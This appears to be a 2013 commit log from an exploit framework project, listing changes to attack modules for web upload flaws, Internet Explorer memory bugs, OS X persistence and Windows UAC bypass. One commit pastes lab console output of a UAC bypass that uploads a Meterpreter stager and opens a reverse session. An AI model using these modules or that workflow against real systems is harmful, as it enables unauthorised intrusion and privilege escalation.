a2e3c6244e
Remove unnecessary Exe::Custom logic.
...
- this is handled by the exe.rb mixin.
- adds support for a RUN_NOW datastore option.
- tested working on java meterpreter and x86 shell session.
2013-10-18 00:41:18 -05:00
ea9235c506
Better whitespace.
2013-10-12 20:53:16 -05:00
78b29b5f20
Bring osx persistence module to the finish line.
2013-10-12 20:50:53 -05:00
5a1b099570
Make osx persistence a local exploit.
2013-10-12 16:47:35 -05:00
4fe407d7ee
Move osx persistence to a local exploit.
2013-10-12 16:08:22 -05:00
9b96351ba2
Land #2494 , OSVDB ref for flashchat_upload_exec
2013-10-10 12:58:55 -05:00
e3014a1e91
Fix ZDI Reference
2013-10-09 14:56:42 -05:00
4fd599b7e0
Land #2483 , @wchen-r7's patch for [SeeRM #8458 ]
2013-10-09 14:32:26 -05:00
52574b09cb
Add OSVDB reference
2013-10-09 14:13:45 -05:00
1e3b84d39b
Update ie_cgenericelement_uaf
2013-10-09 13:40:48 -05:00
199bd20b95
Update CVE-2013-3893's Microsoft reference
...
Official patch is out:
http://technet.microsoft.com/en-us/security/bulletin/MS13-080
2013-10-08 13:00:03 -05:00
8b9ac746db
Land #2481 , deprecate linksys cmd exec module
2013-10-07 20:44:04 -05:00
f7f6abc1dd
Land #2479 - Add Joev to the wolfpack
2013-10-07 15:30:23 -05:00
f4000d35ba
Use RopDb for ms13_069
...
Target tested
2013-10-07 15:24:01 -05:00
7222e3ca49
Use RopDb for ms13_055_canchor.
...
All targets tested.
2013-10-07 15:09:36 -05:00
67228bace8
Use RopDb for ie_cgenericelement_uaf.
...
All targets tested except for Vista, so additional testing will need
to be done during review.
2013-10-07 14:51:34 -05:00
4ba001d6dd
Put my short name to prevent conflicts.
2013-10-07 14:10:47 -05:00
ec6516d87c
Deprecate misnamed module.
...
* Renames to a linux linksys module.
2013-10-07 14:06:13 -05:00
aea63130a4
Use RopDb for ie_cbutton_uaf.
...
All targets tested except for Vista. Will need additional testing
during review.
2013-10-07 14:03:07 -05:00
219bef41a7
Decaps Siemens (consistent with other modules)
2013-10-07 13:12:32 -05:00
4266b88a20
Move author name to just 'joev'
...
[See #2476 ]
2013-10-07 12:50:04 -05:00
e016c9a62f
Use RopDb msvcrt ROP chain. Tested all targets.
2013-10-07 12:27:43 -05:00
0799766faa
Fix UAC is not enabled, no reason to run module when UAC is enabled and vulnerable
...
The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is:
Here is prior to the change on a fully patched Windows 8 machine:
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 172.16.21.156:4444
[*] UAC is Enabled, checking level...
[-] UAC is not enabled, no reason to run module
[-] Run exploit/windows/local/ask to elevate
msf exploit(bypassuac) >
Here's the module when running with the most recent changes that are being proposed:
[*] Started reverse handler on 172.16.21.156:4444
[*] UAC is Enabled, checking level...
[!] Could not determine UAC level - attempting anyways...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (770048 bytes) to 172.16.21.128
[*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400
meterpreter >
With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
2013-10-05 15:56:55 -04:00
24efb55ba9
Clean flashchat_upload_exec
2013-10-05 14:50:51 -05:00
08243b277a
Add FlashChat Arbitrary File Upload exploit module
2013-10-05 22:30:38 +09:30
a8de9d5c8b
Land #2459 - Add HP LoadRunner magentproc.exe Overflow
2013-10-04 19:45:44 -05:00
113f89e40f
First set of fixes for gestioip_exec
2013-10-04 13:29:27 -05:00
299dfe73f1
Land #2460 , @xistence's exploit for clipbucket
2013-10-04 12:26:30 -05:00
8e0a4e08a2
Fix author order
2013-10-04 12:25:38 -05:00
9b79bb99e0
Add references, correct disclosure date
2013-10-04 09:59:26 -05:00
ab786d1466
Imply authentication when a password is set
2013-10-04 09:54:04 -05:00
0112d6253c
add gestio ip module
2013-10-04 06:39:30 -07:00
81d4a8b8c1
added clipbucket_upload_exec RCE
2013-10-04 11:43:38 +07:00
646429b4dd
Put ready to pull request
2013-10-03 22:15:17 -05:00
5971fe87f5
Improve reliability
2013-10-03 17:19:53 -05:00
39eb20e33a
Add module for ZDI-13-169
2013-10-03 16:52:20 -05:00
c87e7b3cc1
Land #2451 - Don't overwrite default timeout on get_once
2013-10-03 15:44:40 -05:00
539a22a49e
Typo on Microsoft
2013-10-03 12:20:47 -05:00
fcba424308
Kill off EOL spaces on astium_sqli_upload.
2013-10-03 11:01:27 -05:00
77d0236b4e
Don't overwrite defaul timeout
2013-10-02 16:15:14 -05:00
23b0c3b723
Add Metasploit blog references
...
These modules have blogs from the Rapid7 community, we should add them.
2013-10-01 20:50:16 -05:00
932ed0a939
Land #2444 - Add SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Vuln
2013-10-01 20:35:17 -05:00
ed82be6fd8
Use RopDB
2013-10-01 13:23:09 -05:00
6483c5526a
Add module for OSVDB 93696
2013-10-01 11:42:36 -05:00
9abf727fa6
Land #2439 - Update description
2013-09-30 16:03:15 -05:00
7118f7dc4c
Land #2422 - rm methods peer & rport
...
Because they're already defined in the HttpClient mixin
2013-09-30 16:01:59 -05:00
3cfee5a7c0
Land #2440 , remaining tabassassin changes
2013-09-30 14:30:50 -05:00
6c8f86883d
Land #2437 , @wchen-r7's exploit for CVE-2013-3893
2013-09-30 14:02:29 -05:00
2e8d19edcf
Retab all the things (except external/)
2013-09-30 13:47:53 -05:00
4dc88cf60f
Expand descriptions for ease of use.
2013-09-30 13:30:31 -05:00
joev
William Vu
jvazquez-r7
sinn3r
Tod Beardsley
trustedsec
bcoles
Brandon Perry
xistence
Brandon Turner
Tab Assassin